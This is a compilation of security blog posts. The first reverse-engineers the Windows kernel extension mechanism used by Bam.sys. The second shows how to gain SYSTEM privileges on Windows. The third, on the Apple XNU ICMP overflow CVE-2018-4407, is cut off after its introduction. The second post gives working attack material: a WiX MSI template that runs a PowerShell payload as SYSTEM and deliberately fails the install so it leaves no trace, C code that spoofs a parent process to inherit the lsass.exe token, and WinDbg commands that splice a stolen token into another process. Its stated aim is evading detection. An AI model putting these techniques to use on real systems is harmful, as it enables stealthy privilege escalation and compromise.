Yes, More Callbacks — The Kernel Extension Mechanism

Original text by Yarden Shafir

Recently I had to write a kernel-mode driver. This has made a lot of people very angry and been widely regarded as a bad move. (Douglas Adams, paraphrased)

Like any other piece of code written by me, this driver had several major bugs which caused some interesting side effects. Specifically, it prevented some other drivers from loading properly and caused the system to crash.

As it turns out, many drivers assume their initialization routine (DriverEntry) always succeeds, and don’t take it well when this assumption breaks. j00ru documented some of these cases a few years ago in his blog, and many of them are still relevant in current Windows versions. However, these buggy drivers are not really the issue here, and j00ru covered them better than I could anyway. Instead I focused on just one of these drivers, which caught my attention and dragged me into researching the so-called “Windows kernel host extensions” mechanism.

The lucky driver is Bam.sys (Background Activity Moderator) — a new driver which was introduced in Windows 10 version 1709 (RS3). When its DriverEntry fails mid-way, the call stack leading to the system crash looks like this:

From this crash dump, we can see that Bam.sys registered a process creation callback and forgot to unregister it before unloading. Then, when a process was created / terminated, the system tried to call this callback, encountered a stale pointer and crashed.

The interesting thing here is not the crash itself, but rather how Bam.sys registers this callback. Normally, process creation callbacks are registered via nt!PsSetCreateProcessNotifyRoutine(Ex), which adds the callback to the nt!PspCreateProcessNotifyRoutine array. Then, whenever a process is being created or terminated, nt!PspCallProcessNotifyRoutines iterates over this array and calls all of the registered callbacks. However, if we run, for example, “!wdbgark.wa_systemcb /type process” in WinDbg, we’ll see that the callback used by Bam.sys is not found in this array.

Instead, Bam.sys uses a whole other mechanism to register its callbacks.

If we take a look at nt!PspCallProcessNotifyRoutines, we can see an explicit reference to some variable named nt!PspBamExtensionHost (there is a similar one referring to the Dam.sys driver). It retrieves a so-called “extension table” using this “extension host” and calls the first function in the extension table, which is bam!BampCreateProcessCallback.

If we open Bam.sys in IDA, we can easily find bam!BampCreateProcessCallback and search for its xrefs. Conveniently, it only has one, in bam!BampRegisterKernelExtension:

As suspected, Bam!BampCreateProcessCallback is not registered via the normal callback registration mechanism. It is actually being stored in a function table named Bam!BampKernelCalloutTable, which is later being passed, together with some other parameters (we’ll talk about them in a minute) to the undocumented nt!ExRegisterExtension function.

I tried to search for any documentation or hints for what this function was responsible for, or what this “extension” is, and couldn’t find much. The only useful resource I found was the leaked ntosifs.h header file, which contains the prototype for nt!ExRegisterExtension as well as the layout of the _EX_EXTENSION_REGISTRATION_1 structure.

Prototype for nt!ExRegisterExtension and _EX_EXTENSION_REGISTRATION_1, as supplied in ntosifs.h:

    NTSTATUS ExRegisterExtension(
        _Outptr_ PEX_EXTENSION *Extension,
        _In_ ULONG RegistrationVersion,
        _In_ PVOID RegistrationInfo
    );

    typedef struct _EX_EXTENSION_REGISTRATION_1
    {
        USHORT ExtensionId;
        USHORT ExtensionVersion;
        USHORT FunctionCount;
        VOID *FunctionTable;
        PVOID *HostInterface;
        PVOID DriverObject;
    } EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1;

After a bit of reverse engineering, I figured that the formal input parameter “PVOID RegistrationInfo” is actually of type PEX_EXTENSION_REGISTRATION_1.

The pseudo-code of nt!ExRegisterExtension is shown in appendix B, but here are the main points:

  1. nt!ExRegisterExtension extracts the ExtensionId and ExtensionVersion members of the RegistrationInfo structure and uses them to locate a matching host in nt!ExpHostList (using the nt!ExpFindHost function, whose pseudo-code appears in appendix B).
  2. Then, the function verifies that the number of functions supplied in RegistrationInfo->FunctionCount matches the expected number set in the host’s structure. It also makes sure that the host’s FunctionTable field has not already been initialized. Basically, this check means that an extension cannot be registered twice.
  3. If everything seems OK, the host’s FunctionTable field is set to point to the FunctionTable supplied in RegistrationInfo.
  4. Additionally, RegistrationInfo->HostInterface is set to point to some data found in the host structure. This data is interesting, and we’ll discuss it soon.
  5. Eventually, the fully initialized host is returned to the caller via an output parameter.

We saw that nt!ExRegisterExtension searches for a host that matches RegistrationInfo. The question now is, where do these hosts come from?

  • During its initialization, NTOS performs several calls to nt!ExRegisterHost. In every call it passes a structure identifying a single driver from a list of predetermined drivers (full list in appendix A). For example, here is the call which initializes a host for Bam.sys:
  • nt!ExRegisterHost allocates a structure of type _HOST_LIST_ENTRY (unofficial name, coined by me), initializes it with data supplied by the caller, and adds it to the end of nt!ExpHostList. The _HOST_LIST_ENTRY structure is undocumented, and looks something like this:
    struct _HOST_LIST_ENTRY
    {
        _LIST_ENTRY List;
        DWORD RefCount;
        USHORT ExtensionId;
        USHORT ExtensionVersion;
        USHORT FunctionCount;       // number of callbacks that the extension contains
        POOL_TYPE PoolType;         // where this host is allocated
        PVOID HostInterface;        // table of unexported nt functions, to be used
                                    // by the driver to which this extension belongs
        PVOID FunctionAddress;      // optional, rarely used. This callback is called
                                    // before and after an extension for this host
                                    // is registered / unregistered
        PVOID ArgForFunction;       // will be sent to the function saved in FunctionAddress
        _EX_RUNDOWN_REF RundownRef;
        _EX_PUSH_LOCK Lock;
        PVOID FunctionTable;        // a table of the callbacks that the driver “registers”
        DWORD Flags;                // Only uses one bit. Not sure about its meaning.
    };
  • When one of the predetermined drivers loads, it registers an extension using nt!ExRegisterExtension and supplies a RegistrationInfo structure, containing a table of functions (as we saw Bam.sys doing). This table of functions will be placed in the FunctionTable member of the matching host. These functions will be called by NTOS on certain occasions, which makes them a kind of callback.

Earlier we saw that part of what nt!ExRegisterExtension does is set RegistrationInfo->HostInterface (which points to a global variable in the calling driver) to point to some data found in the host structure. Let’s get back to that.

Every driver which registers an extension has a host initialized for it by NTOS. This host contains, among other things, a HostInterface, pointing to a predetermined table of unexported NTOS functions. Different drivers receive different HostInterfaces, and some don’t receive one at all.

For example, this is the HostInterface that Bam.sys receives:

So the “kernel extensions” mechanism is actually a bi-directional communication port: The driver supplies a list of “callbacks”, to be called on different occasions, and receives a set of functions for its own internal use.
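To make the two directions concrete, here is a minimal user-mode sketch in C of the handshake described so far. It is only a model under my own assumptions, not the kernel's implementation: every name in it (sketch_host, sketch_register_host, sketch_register_extension and so on) is made up for illustration, the host list is a fixed-size array instead of a linked list, the return codes are arbitrary, and locking and reference counting are left out entirely.

```c
#include <stddef.h>
#include <stdint.h>

#define SKETCH_MAX_HOSTS 8

typedef void (*sketch_callout)(void);

/* Simplified stand-in for a host entry; the fields mirror the ones discussed above. */
typedef struct sketch_host {
    uint16_t extension_id;
    uint16_t extension_version;
    uint16_t function_count;        /* number of callbacks the host expects */
    const void *host_interface;     /* table handed back to the driver */
    sketch_callout *function_table; /* NULL until an extension registers */
} sketch_host;

static sketch_host sketch_hosts[SKETCH_MAX_HOSTS];
static size_t sketch_host_count;

/* Sample callback, so that a table can be built when trying the sketch out. */
void sketch_noop_callout(void) { }

/* Linear lookup by (id, version); returns NULL when no host matches. */
sketch_host *sketch_find_host(uint16_t id, uint16_t version)
{
    for (size_t i = 0; i < sketch_host_count; i++) {
        if (sketch_hosts[i].extension_id == id &&
            sketch_hosts[i].extension_version == version) {
            return &sketch_hosts[i];
        }
    }
    return NULL;
}

/* "NTOS side": create a host. Returns 0, or -1 if the list is full or the host exists. */
int sketch_register_host(uint16_t id, uint16_t version,
                         uint16_t function_count, const void *host_interface)
{
    if (sketch_host_count == SKETCH_MAX_HOSTS ||
        sketch_find_host(id, version) != NULL) {
        return -1;
    }
    sketch_host *host = &sketch_hosts[sketch_host_count++];
    host->extension_id = id;
    host->extension_version = version;
    host->function_count = function_count;
    host->host_interface = host_interface;
    host->function_table = NULL;
    return 0;
}

/* "Driver side": hand over a callback table and receive the host interface.
 * Returns 0 on success, -1 if no host matches, -2 if the table is missing,
 * too short or contains a NULL entry, -3 if an extension is already registered. */
int sketch_register_extension(uint16_t id, uint16_t version,
                              sketch_callout *table, uint16_t count,
                              const void **host_interface_out)
{
    sketch_host *host = sketch_find_host(id, version);
    if (host == NULL) {
        return -1;
    }
    if (table == NULL || count < host->function_count) {
        return -2;
    }
    for (uint16_t i = 0; i < count; i++) {
        if (table[i] == NULL) {
            return -2;
        }
    }
    if (host->function_table != NULL) {
        return -3;
    }
    host->function_table = table;                   /* driver -> NTOS direction */
    if (host_interface_out != NULL) {
        *host_interface_out = host->host_interface; /* NTOS -> driver direction */
    }
    return 0;
}
```

In this model, "NTOS" would call sketch_register_host once per predetermined driver at start-up, and each "driver" would later call sketch_register_extension with its own table and read back the interface pointer.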

To stick with the example of Bam.sys, let’s take a look at the callbacks that it supplies:

  • BampCreateProcessCallback
  • BampSetThrottleStateCallback
  • BampGetThrottleStateCallback
  • BampSetUserSettings
  • BampGetUserSettingsHandle

The host initialized for Bam.sys “knows” in advance that it should receive a table of 5 functions. These functions must be laid out in the exact order presented here, since they are called according to their index. NTOS relies on this: in one case, for instance, it calls the function found in nt!PspBamExtensionHost->FunctionTable[4].
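Calling by index can be illustrated with a small C sketch. The enum names, the callback signature and the helper call_extension_slot are all hypothetical (the real callbacks have their own undocumented prototypes), and the defensive checks are mine, added for the example rather than taken from NTOS. The only thing borrowed from the text is the order of the five slots.

```c
#include <stddef.h>

/* Hypothetical index names; the order mirrors the list of Bam.sys callbacks above. */
enum bam_callout_index {
    BAM_IDX_CREATE_PROCESS = 0,
    BAM_IDX_SET_THROTTLE_STATE,
    BAM_IDX_GET_THROTTLE_STATE,
    BAM_IDX_SET_USER_SETTINGS,
    BAM_IDX_GET_USER_SETTINGS_HANDLE,
    BAM_IDX_COUNT
};

/* Simplified callback type: every slot takes and returns an int in this model. */
typedef int (*indexed_callout)(int arg);

/* Two demo callbacks so that the dispatch can be observed. */
int demo_create_process(int arg) { return arg + 100; }
int demo_get_user_settings_handle(int arg) { return arg + 400; }

/* Calls table[index](arg) and stores the result.
 * Returns 0 on success, -1 if the table, index or slot is unusable. */
int call_extension_slot(const indexed_callout *table, size_t count,
                        size_t index, int arg, int *result)
{
    if (table == NULL || result == NULL || index >= count || table[index] == NULL) {
        return -1;
    }
    *result = table[index](arg);
    return 0;
}
```

Because the caller only knows a slot number, swapping two entries in the table would silently route a call to the wrong function, which is why the layout has to match what the host expects.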

To conclude, there exists a mechanism to “extend” NTOS by means of registering specific callbacks and retrieving unexported functions to be used by certain predetermined drivers.

I don’t know if there is any practical use for this knowledge, but I thought it was interesting enough to share. If you find anything useful / interesting to do with this mechanism, I’d love to know 🙂

Appendix A — Extension hosts initialized by NTOS:

Appendix B — functions pseudo-code:

NTSTATUS ExRegisterExtension(_Outptr_ PEX_EXTENSION *Extension, _In_ ULONG RegistrationVersion, _In_ PREGISTRATION_INFO RegistrationInfo)
{
    // ERROR_STATUS is a placeholder: the exact NTSTATUS returned on each failure path is not shown in this listing.

    // Validate that version is ok and that FunctionTable is not sent without FunctionCount or vice versa.
    if ( ((RegistrationVersion & 0xFFFF0000) != 0x10000) || (RegistrationInfo->FunctionTable == nullptr && RegistrationInfo->FunctionCount != 0) )
        return ERROR_STATUS;

    // Skipping over some lock-related stuff,
    // Find the host with the matching version and id.
    pHostListEntry = ExpFindHost(RegistrationInfo->ExtensionId, RegistrationInfo->ExtensionVersion);

    // More lock-related stuff.

    if (!pHostListEntry)
        return ERROR_STATUS;

    // Verify that the FunctionCount in the host doesn't exceed the FunctionCount supplied by the caller.
    if (RegistrationInfo->FunctionCount < pHostListEntry->FunctionCount)
        return ERROR_STATUS;

    // Check that none of the FunctionCount entries in FunctionTable is null.
    PVOID *FunctionTable = (PVOID *)RegistrationInfo->FunctionTable;
    for (int i = 0; i < RegistrationInfo->FunctionCount; i++)
    {
        if ( FunctionTable[i] == nullptr )
            return ERROR_STATUS;
    }

    // skipping over some more lock-related stuff

    // Check if there is already an extension registered for this host.
    if (pHostListEntry->FunctionTable != nullptr || FlagOn(pHostListEntry->Flags, 1) )
    {
        // There is something related to locks here
        return ERROR_STATUS;
    }

    // If there is a callback function for this host, call it before registering the extension, with 0 as the first parameter.
    if (pHostListEntry->FunctionAddress)
        pHostListEntry->FunctionAddress(0, pHostListEntry->ArgForFunction);

    // Set the FunctionTable in the host to the table supplied by the caller, or to MmBadPointer if a table wasn't supplied.
    if (RegistrationInfo->FunctionTable == nullptr)
        pHostListEntry->FunctionTable = nt!MmBadPointer;
    else
        pHostListEntry->FunctionTable = RegistrationInfo->FunctionTable;

    pHostListEntry->RundownRef = 0;

    // If there is a callback function for this host, call it after registering the extension, with 1 as the first parameter.
    if (pHostListEntry->FunctionAddress)
        pHostListEntry->FunctionAddress(1, pHostListEntry->ArgForFunction);

    // Here there is some more lock-related stuff

    // Set the HostTable of the calling driver to the table of functions listed in the host.
    if (RegistrationInfo->HostTable != nullptr)
        *RegistrationInfo->HostTable = pHostListEntry->HostInterface;

    // Return the initialized host to the caller in the output Extension parameter.
    *Extension = pHostListEntry;
    return STATUS_SUCCESS;
}


NTSTATUS ExRegisterHost(_Out_ PHOST_LIST_ENTRY *ExtensionHost, _In_ ULONG Unused, _In_ PHOST_INFORMATION HostInformation)
{
    // Allocate memory for a new HOST_LIST_ENTRY
    PHOST_LIST_ENTRY p = ExAllocatePoolWithTag(HostInformation->PoolType, 0x60, 'HExE');
    if (p == nullptr)
    {
        // Allocation failed. The status returned here is not shown in this listing.
        return Status;
    }

    // Initialize a new HOST_LIST_ENTRY
    p->Flags &= 0xFE;
    p->RefCount = 1;
    p->FunctionTable = 0;
    p->ExtensionId = HostInformation->ExtensionId;
    p->ExtensionVersion = HostInformation->ExtensionVersion;
    p->HostInterface = HostInformation->HostInterface;
    p->FunctionAddress = HostInformation->FunctionAddress;
    p->ArgForFunction = HostInformation->ArgForFunction;
    p->Lock = 0;
    p->RundownRef = 0;

    // Search for an existing listEntry with the same version and id.
    PHOST_LIST_ENTRY listEntry = ExpFindHost(HostInformation->ExtensionId, HostInformation->ExtensionVersion);
    if (listEntry)
    {
        // A host with this id and version already exists.
        // The failure handling for this branch is not shown in this listing.
    }
    else
    {
        // Insert the new HOST_LIST_ENTRY to the end of ExpHostList.
        if ( *lastHostListEntry != &firstHostListEntry )
        {
            // List consistency check; its failure handling is not shown in this listing.
        }

        firstHostListEntry->Prev = p;
        p->Next = firstHostListEntry;
        lastHostListEntry = p;

        *ExtensionHost = p;
    }
    return Status;
}


PHOST_LIST_ENTRY ExpFindHost(USHORT ExtensionId, USHORT ExtensionVersion)
{
    // Walk the list from the first entry until we are back at the list head.
    for (entry = ExpHostList.Next; ; entry = entry->Next)
    {
        if (entry == &ExpHostList)
            return 0;
        if ( entry->ExtensionId == ExtensionId && entry->ExtensionVersion == ExtensionVersion )
            return entry;
    }
}


void ExpDereferenceHost(PHOST_LIST_ENTRY Host)
{
    // Drop one reference; free the host when the last reference goes away.
    if ( InterlockedExchangeAdd(&Host->RefCount, 0xFFFFFFFF) == 1 )
        ExFreePoolWithTag(Host, 0);
}


Appendix C — structures definitions:

    struct _HOST_INFORMATION
    {
        USHORT ExtensionId;
        USHORT ExtensionVersion;
        DWORD FunctionCount;
        POOL_TYPE PoolType;
        PVOID HostInterface;
        PVOID FunctionAddress;
        PVOID ArgForFunction;
        PVOID unk;
    };

    struct _HOST_LIST_ENTRY
    {
        _LIST_ENTRY List;
        DWORD RefCount;
        USHORT ExtensionId;
        USHORT ExtensionVersion;
        USHORT FunctionCount;       // number of callbacks that the extension contains
        POOL_TYPE PoolType;         // where this host is allocated
        PVOID HostInterface;        // table of unexported nt functions, to be used
                                    // by the driver to which this extension belongs
        PVOID FunctionAddress;      // optional, rarely used. This callback is called
                                    // before and after an extension for this host
                                    // is registered / unregistered
        PVOID ArgForFunction;       // will be sent to the function saved in FunctionAddress
        _EX_RUNDOWN_REF RundownRef;
        _EX_PUSH_LOCK Lock;
        PVOID FunctionTable;        // a table of the callbacks that the driver “registers”
        DWORD Flags;                // Only uses one flag. Not sure about its meaning.
    };

    // Called REGISTRATION_INFO in the pseudo-code above.
    struct _EX_EXTENSION_REGISTRATION_1
    {
        USHORT ExtensionId;
        USHORT ExtensionVersion;
        USHORT FunctionCount;
        PVOID FunctionTable;
        PVOID *HostTable;
        PVOID DriverObject;
    };

Alternative methods of becoming SYSTEM

( Original text by XPN )

For many pentesters, Meterpreter’s getsystem command has become the default method of gaining SYSTEM account privileges, but have you ever wondered just how this works behind the scenes?

In this post I will show the details of how this technique works, and explore a couple of methods which are not quite as popular, but may help evade detection on those tricky redteam engagements.

Meterpreter’s «getsystem»

Most of you will have used the getsystem module in Meterpreter before. For those that haven’t, getsystem is a module offered by the Metasploit-Framework which allows an administrative account to escalate to the local SYSTEM account, usually from local Administrator.

Before continuing we first need to understand a little about how a process can impersonate another user. Impersonation is a mechanism provided by Windows that lets a process take on another user’s security context. For example, if a process acting as an FTP server allows a user to authenticate and only wants to allow access to files owned by a particular user, the process can impersonate that user account and let Windows enforce security.

To facilitate impersonation, Windows exposes numerous native APIs to developers, for example:

  • ImpersonateNamedPipeClient
  • ImpersonateLoggedOnUser
  • RevertToSelf
  • LogonUser
  • OpenProcessToken

Of these, the ImpersonateNamedPipeClient API call is key to the getsystem module’s functionality, and takes credit for how it achieves its privilege escalation. This API call allows a process to impersonate the access token of another process which connects to a named pipe and performs a write of data to that pipe (that last requirement is important ;). For example, if a process belonging to «victim» connects and writes to a named pipe belonging to «attacker», the attacker can call ImpersonateNamedPipeClient to retrieve an impersonation token belonging to «victim», and therefore impersonate this user. Obviously, this opens up a huge security hole, and for this reason a process must hold the SeImpersonatePrivilege privilege.

This privilege is by default only available to a number of high privileged users:


This does however mean that a local Administrator account can use ImpersonateNamedPipeClient, which is exactly how getsystem works:

  1. getsystem creates a new Windows service, set to run as SYSTEM, which when started connects to a named pipe.
  2. getsystem spawns a process, which creates a named pipe and awaits a connection from the service.
  3. The Windows service is started, causing a connection to be made to the named pipe.
  4. The process receives the connection, and calls ImpersonateNamedPipeClient, resulting in an impersonation token being created for the SYSTEM user.

All that is left to do is to spawn cmd.exe with the newly gathered SYSTEM impersonation token, and we have a SYSTEM privileged process.

To show how this can be achieved outside of the Meterpreter-Framework, I’ve previously released a simple tool which will spawn a SYSTEM shell when executed. This tool follows the same steps as above, and can be found on my github account here.

To see how this works when executed, a demo can be found below:

Now that we have an idea just how getsystem works, let’s look at a few alternative methods which can allow you to grab SYSTEM.

MSIExec method

For anyone unlucky enough to follow me on Twitter, you may have seen my recent tweet about using a .MSI package to spawn a SYSTEM process:

Adam Chester (@_xpn_)

There is something nice about embedding a Powershell one-liner in a .MSI, nice alternative way to execute as SYSTEM 🙂

This came about after a bit of research I was doing into the Duqu 2.0 malware, in which this APT actor was delivering malware packaged within an MSI file.

It turns out that a benefit of launching your code via an MSI is the SYSTEM privileges that you gain during the install process. To understand how this works, we need to look at WIX Toolset, which is an open source project used to create MSI files from XML build scripts.

The WIX Framework is made up of several tools, but the two that we will focus on are:

  • candle.exe — Takes a .WIX XML file and outputs a .WIXOBJ
  • light.exe — Takes a .WIXOBJ and creates a .MSI

Reviewing the documentation for WIX, we see that custom actions are provided, which give the developer a way to launch scripts and processes during the install process. Within the CustomAction documentation, we see something interesting:


This documents a simple way in which an MSI can be used to launch processes as SYSTEM, by providing a custom action with the Impersonate attribute set to no.

When crafted, our WIX file will look like this:

<?xml version="1.0"?>
<Wix xmlns="">
  <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
    <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
    <Media Id="1" Cabinet="" EmbedCab="yes"/>
    <Directory Id="TARGETDIR" Name="SourceDir">
      <Directory Id="ProgramFilesFolder">
        <Directory Id="INSTALLLOCATION" Name="Example">
          <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
            <File Id="ApplicationFile1" Source="example.exe"/>
          </Component>
        </Directory>
      </Directory>
    </Directory>
    <Feature Id="DefaultFeature" Level="1">
      <ComponentRef Id="ApplicationFiles"/>
    </Feature>
    <Property Id="cmdline">powershell...</Property>
    <CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
    <CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
      invalid vbs to fail install
    </CustomAction>
    <InstallExecuteSequence>
      <Custom Action="SystemShell" After="InstallInitialize"></Custom>
      <Custom Action="FailInstall" Before="InstallFiles"></Custom>
    </InstallExecuteSequence>
  </Product>
</Wix>

A lot of this is just boilerplate to generate an MSI, however the parts to note are our custom actions:

<Property Id="cmdline">powershell...</Property>
<CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>

This custom action is responsible for executing our provided cmdline as SYSTEM (note the Property tag, which is a nice way to get around the length limitation of the ExeCommand attribute for long PowerShell commands).

Another useful trick is to make the install fail after our command has executed, which stops the installer from adding a new entry to «Add or Remove Programs». This is shown here by executing invalid VBScript:

<CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
  invalid vbs to fail install
</CustomAction>

Finally, we have our InstallExecuteSequence tag, which is responsible for executing our custom actions in order:

<InstallExecuteSequence>
  <Custom Action="SystemShell" After="InstallInitialize"></Custom>
  <Custom Action="FailInstall" Before="InstallFiles"></Custom>
</InstallExecuteSequence>

So, when executed:

  1. Our first custom action will be launched, forcing our payload to run as the SYSTEM account.
  2. Our second custom action will be launched, causing some invalid VBScript to be executed and stop the install process with an error.

To compile this into an MSI we save the above contents as a file called «msigen.wix», and use the following commands:

candle.exe msigen.wix
light.exe msigen.wixobj

Finally, execute the MSI file to execute our payload as SYSTEM:



This method of becoming SYSTEM was actually revealed to me via James Forshaw’s walkthrough of how to become «Trusted Installer».

Again, if you listen to my ramblings on Twitter, you may have seen me mention this technique a few weeks back:

How this technique works is by leveraging the CreateProcess Win32 API call, and using its support for assigning the parent of a newly spawned process via the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute.

If we review the documentation of this setting, we see the following:


So, this means if we set the parent process of our newly spawned process, we will inherit the process token. This gives us a cool way to grab the SYSTEM account via the process token.

We can create a new process and set the parent with the following code:

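int pid;
HANDLE pHandle = NULL;
STARTUPINFOEXA si;       // extended startup info carrying the attribute list
PROCESS_INFORMATION pi;  // receives the handles of the new process
SIZE_T size;
BOOL ret;

// Set the PID to a SYSTEM process PID
pid = 555;

// Open the process which we will inherit the handle from
if ((pHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid)) == 0) {
	printf("Error opening PID %d\n", pid);
	return 2;
}

ZeroMemory(&si, sizeof(STARTUPINFOEXA));

// The first call only reports the buffer size needed for one attribute
InitializeProcThreadAttributeList(NULL, 1, 0, &size);
si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, size);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &pHandle, sizeof(HANDLE), NULL, NULL);

si.StartupInfo.cb = sizeof(STARTUPINFOEXA);

// Finally, create the process.
// The argument list is truncated in this listing; the values below are a
// reconstruction, and the cmd.exe path in particular is an assumption.
ret = CreateProcessA(
	"C:\\Windows\\System32\\cmd.exe",
	NULL,
	NULL,
	NULL,
	true,
	EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE,
	NULL,
	NULL,
	(LPSTARTUPINFOA)&si,
	&pi
);

if (ret == false) {
	printf("Error creating new process (%lu)\n", GetLastError());
	return 3;
}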

When compiled, we see that we can launch a process and inherit an access token from a parent process running as SYSTEM such as lsass.exe:


The source for this technique can be found here.

Alternatively, NtObjectManager provides a nice easy way to achieve this using Powershell:

New-Win32Process cmd.exe -CreationFlags Newconsole -ParentProcess (Get-NtProcess -Name lsass.exe)

Bonus Round: Getting SYSTEM via the Kernel

OK, so this technique is just a bit of fun, and not something that you are likely to come across in an engagement… but it goes some way to show just how Windows is actually managing process tokens.

Often you will see Windows kernel privilege escalation exploits tamper with a process structure in the kernel address space, with the aim of updating a process token. For example, in the popular MS15-010 privilege escalation exploit (found on exploit-db here), we can see a number of references to manipulating access tokens.

For this analysis, we will be using WinDBG on a Windows 7 x64 virtual machine in which we will be looking to elevate the privileges of our cmd.exe process to SYSTEM by manipulating kernel structures. (I won’t go through how to set up the Kernel debugger connection as this is covered in multiple places for multiple hypervisors.)

Once you have WinDBG connected, we first need to gather information on our running process which we want to elevate to SYSTEM. This can be done using the !process command:

!process 0 0 cmd.exe

In the output we can see some important information about our process, such as the number of open handles and the process environment block address:

PROCESS fffffa8002edd580
    SessionId: 1  Cid: 0858    Peb: 7fffffd4000  ParentCid: 0578
    DirBase: 09d37000  ObjectTable: fffff8a0012b8ca0  HandleCount:  21.
    Image: cmd.exe

For our purpose, we are interested in the provided PROCESS address (in this example fffffa8002edd580), which is actually a pointer to an EPROCESS structure. The EPROCESS structure (documented by Microsoft here) holds important information about a process, such as the process ID and references to the process threads.

Amongst the many fields in this structure is a pointer to the process’s access token, defined in a TOKEN structure. To view the contents of the token, we first must calculate the TOKEN address. On Windows 7 x64, the token pointer is stored at offset 0x208 within EPROCESS; this offset differs between Windows versions (and potentially service packs). We can retrieve the pointer with the following command:

kd> dq fffffa8002edd580+0x208 L1

This returns the token address as follows:

fffffa80`02edd788  fffff8a0`00d76c51

As the token address is stored in an EX_FAST_REF structure, whose low 4 bits on x64 hold a reference count rather than address bits, we must AND the value with a mask to obtain the true pointer address:

kd> ? fffff8a0`00d76c51 & ffffffff`fffffff0

Evaluate expression: -8108884136880 = fffff8a0`00d76c50
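The same arithmetic can be written as a few lines of C, which may help if you want to script it. This is only a sketch: the helper names are mine, the 0x208 offset is the Windows 7 x64 value quoted above and will be wrong on other builds, and the 4-bit mask applies to x64.

```c
#include <stdint.h>

/* Offset of the Token field inside EPROCESS on Windows 7 x64 (value quoted in the text). */
#define SKETCH_TOKEN_OFFSET_WIN7_X64 UINT64_C(0x208)

/* On x64, the low 4 bits of an EX_FAST_REF hold a reference count. */
#define SKETCH_FAST_REF_MASK UINT64_C(0xF)

/* Address at which the token EX_FAST_REF is stored for a given EPROCESS. */
uint64_t sketch_token_field_address(uint64_t eprocess)
{
    return eprocess + SKETCH_TOKEN_OFFSET_WIN7_X64;
}

/* Strips the reference count bits to recover the real TOKEN pointer. */
uint64_t sketch_fast_ref_pointer(uint64_t raw_value)
{
    return raw_value & ~SKETCH_FAST_REF_MASK;
}

/* Extracts the reference count stored in the low bits. */
unsigned sketch_fast_ref_count(uint64_t raw_value)
{
    return (unsigned)(raw_value & SKETCH_FAST_REF_MASK);
}
```

Feeding in the values from this session, sketch_token_field_address(0xfffffa8002edd580) gives 0xfffffa8002edd788, and sketch_fast_ref_pointer(0xfffff8a000d76c51) gives 0xfffff8a000d76c50, matching the debugger output.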

So the true TOKEN address for cmd.exe is fffff8a0`00d76c50. Next, we can dump the TOKEN structure members for our process using the following command:

kd> !token fffff8a0`00d76c50

This gives us an idea of the information held by the process token:

User: S-1-5-21-3262056927-4167910718-262487826-1001
User Groups:
 00 S-1-5-21-3262056927-4167910718-262487826-513
    Attributes - Mandatory Default Enabled
 01 S-1-1-0
    Attributes - Mandatory Default Enabled
 02 S-1-5-32-544
    Attributes - DenyOnly
 03 S-1-5-32-545
    Attributes - Mandatory Default Enabled
 04 S-1-5-4
    Attributes - Mandatory Default Enabled
 05 S-1-2-1
    Attributes - Mandatory Default Enabled
 06 S-1-5-11
    Attributes - Mandatory Default Enabled
 07 S-1-5-15
    Attributes - Mandatory Default Enabled
 08 S-1-5-5-0-2917477
    Attributes - Mandatory Default Enabled LogonId
 09 S-1-2-0
    Attributes - Mandatory Default Enabled
 10 S-1-5-64-10
    Attributes - Mandatory Default Enabled
 11 S-1-16-8192
    Attributes - GroupIntegrity GroupIntegrityEnabled
Primary Group: S-1-5-21-3262056927-4167910718-262487826-513
 19 0x000000013 SeShutdownPrivilege               Attributes -
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default
 25 0x000000019 SeUndockPrivilege                 Attributes -
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes -
 34 0x000000022 SeTimeZonePrivilege               Attributes -

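So how do we escalate our process to gain SYSTEM access? Well, we just steal the token from another SYSTEM privileged process, such as lsass.exe, and splice this into our cmd.exe EPROCESS using the following (the names in angle brackets are placeholders for the addresses returned on your own system):

kd> !process 0 0 lsass.exe
kd> dq <LSASS_EPROCESS_ADDRESS>+0x208 L1
kd> ? <LSASS_TOKEN_VALUE> & ffffffff`fffffff0
kd> !process 0 0 cmd.exe
kd> eq <CMD_EPROCESS_ADDRESS>+0x208 <LSASS_TOKEN_ADDRESS>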

To see what this looks like when run against a live system, I’ll leave you with a quick demo showing cmd.exe being elevated from a low level user, to SYSTEM privileges:

Kernel RCE caused by buffer overflow in Apple’s ICMP packet-handling code (CVE-2018-4407)

( Original text )

This post is about a heap buffer overflow vulnerability which I found in Apple’s XNU operating system kernel. I have written a proof-of-concept exploit which can reboot any Mac or iOS device on the same network, without any user interaction. Apple have classified this vulnerability as a remote code execution vulnerability in the kernel, because it may be possible to exploit the buffer overflow to execute arbitrary code in the kernel.

The following operating system versions and devices are vulnerable:

  • Apple iOS 11 and earlier: all devices (upgrade to iOS 12)
  • Apple macOS High Sierra, up to and including 10.13.6: all devices (patched in security update 2018-001)
  • Apple macOS Sierra, up to and including 10.12.6: all devices (patched in security update 2018-005)
  • Apple OS X El Capitan and earlier: all devices

I reported the vulnerability in time for Apple to patch the vulnerability for iOS 12 (released on September 17) and macOS Mojave (released on September 24). Both patches were announced retrospectively on October 30.

Severity and Mitigation

